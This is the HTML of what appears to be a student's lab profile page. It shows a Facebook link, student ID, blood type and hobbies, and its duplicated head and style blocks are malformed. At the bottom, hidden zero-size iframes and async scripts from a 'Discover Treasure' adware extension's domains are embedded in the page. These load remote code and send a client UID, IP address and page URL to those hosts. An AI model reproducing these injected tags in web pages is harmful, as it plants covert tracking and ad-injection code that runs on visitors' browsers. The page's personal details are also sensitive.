<html> ==$0
<head>
<style>

    .h1
     {
        color:green;
        text-align:center;
        font-size: 100px;
        font-family:DFKai-sb; 
     }
    .thick-blue-border 
     {
        border-color: blue;
        border-width: 10px;
        border-style: solid;
        border-radius: 50%;
     }
    .smaller-image 
     {
         width: 400px;
     }
    .list
     {
        color:yellow;
        text-align:center;
        font-size: 30px;
        font-family:DFKai-sb; 
     }
     body{
            background-image: url(http://www.soci.tw/cht/images/fju.jpg);
            background-repeat: no-repeat;
            background-attachment: fixed;
            background-position: center;
            background-size: cover;
        }
  <style>
<style type="text/css"></style>
<script type="text/javascript" async="" src="https://cdn.mxpnl.com/libs/mixpanel-2.1.min.js"></script>
<head><style>
    .h1
     {
        color:green;
        text-align:center;
        font-size: 100px;
        font-family:DFKai-sb; 
     }
    .thick-blue-border 
     {
        border-color: blue;
        border-width: 10px;
        border-style: solid;
        border-radius: 50%;
     }
    .smaller-image 
     {
         width: 400px;
     }
    .list
     {
        color:yellow;
        text-align:center;
        font-size: 30px;
        font-family:DFKai-sb; 
     }
     body{
            background-image: url(http://www.soci.tw/cht/images/fju.jpg);
            background-repeat: no-repeat;
            background-attachment: fixed;
            background-position: center;
            background-size: cover;
        }
  </style>
 
   <style type="text/css"></style><script type="text/javascript" async="" src="https://cdn.mxpnl.com/libs/mixpanel-2.1.min.js"></script>
</head>
<body>
<h1 class="h1">歡迎</h1>
<p align="center">
<a href="https://www.facebook.com/lin.y.jun.750">
<span style="font-family:DFKai-sb;">武金兒的facebook</span>
</a>
</p>
 
     <img class="thick-blue-border smaller-image" src="https://scontent.ftpe4-1.fna.fbcdn.net/v/t1.0-9/15622205_1187371531347884_9135241413989948838_n.jpg?oh=c494bec3b3e6868a9493da3547a5d9e8&amp;oe=599821FD" style="display:block; margin:auto;">
     <p align="center">
<font size="40" color="red" face="DFKai-sb">簡介</font>
</p>
     <p class="list">系級: 資工二甲</p>
     <p class="list">學號: 404261024</p>
     <p class="list">星座: 射手</p>
     <p class="list">血型: O型</p>
     <p class="list">興趣: 重訓、聽音樂、看小說</p>
 
 

<iframe id="DiscoverTreasure" src="https://discovertreasure-a.akamaihd.net/DiscoverTreasure/cf?g=eb917105-1ce2-41c6-abd3-c48c3cc5ff58&amp;pn=Chrome" t="BLGC" style="width: 1px; height: 1px; display: none;">
</iframe>
<div id="gsdfcdiv">
<iframe src="https://discovertreasure-a.akamaihd.net/a24/gsd.html?d=https%3A%2F%2Frichard0701.github.io&amp;v=3" style="width: 0px; height: 0px; display: none;">
</iframe>
</div>
<script type="text/javascript" src="//mhg.unconsciousnessbleakest.com/affs?addonname=Discover Treasure&amp;clientuid=eb917105-1ce2-41c6-abd3-c48c3cc5ff58&amp;subID=6YC3G&amp;isrc=ef2tw&amp;clientip=27.105.243.112&amp;countryCode=TW&amp;affid=9616&amp;subaffid=1019&amp;callback=rvztranscbgloref&amp;href=https%3A%2F%2Frichard0701.github.io%2FRichard-Lab3%2F" async="">
</script>
<script type="text/javascript" charset="UTF-8" src="//ibf.stutterscontainer.com/get/?d=W3siZ2xidiI6ImRiN2UxODA0In0seyJyZWZlcmVyIjoiaHR0cHM6Ly9zbHMud2Vjby5uZXQvbm9kZS8yODQyOSJ9LHsiaXAiOiIyNy4xMDUuMjQzLjExMiJ9LHsiY291bnRyeSI6InR3In0seyJwcG0iOjB9LHsic2VydmljZURvbWFpbiI6ImliZi5zdHV0dGVyc2NvbnRhaW5lci5jb20ifSx7ImhlYWRsaW5lIjoi5q2h6L%2BO5L6G5Yiw5p6X5b2l6Yie55qE5YCL5Lq657ay6aCBIn0seyJldiI6IjI1LDQwIn0seyJtaW5nVmVyIjoiSVdBaTlLVTA2ciJ9LHsiY2xiayI6InJ2enRyYW5zY2JnbG9yZWYifSx7Im11bHRpc3RlciI6MX0seyJ1MSI6ImRiN2VmMjhjLTRmNmQtNGNiZi05YTJhLTA1NDg2MTg4ODdhNSJ9LHsiY3R4X3ZhbHVlIjoiIn0seyJ0aXRsZSI6IiJ9LHsidXJsIjoiaHR0cHM6Ly9yaWNoYXJkMDcwMS5naXRodWIuaW8vUmljaGFyZC1MYWIzLyJ9LHsiY2hhbm5lbCI6Ijk2MTYtMTAxOSJ9LHsibXN0cnN0ciI6InpienBxZk4yIn0seyJwY2xiayI6InBkYjdlMTgwNGNiIn1d">
</script>
<script type="text/javascript" src="//asrvvv-a.akamaihd.net/get?addonname=Discover Treasure&amp;clientuid=eb917105-1ce2-41c6-abd3-c48c3cc5ff58&amp;subID=6YC3G&amp;isrc=ef2tw&amp;clientip=27.105.243.112&amp;countryCode=TW&amp;affid=9616&amp;subaffid=1020&amp;callback=rvz2transcbgloref&amp;href=https%3A%2F%2Frichard0701.github.io%2FRichard-Lab3%2F" async="">
</script>
</body>
</html>
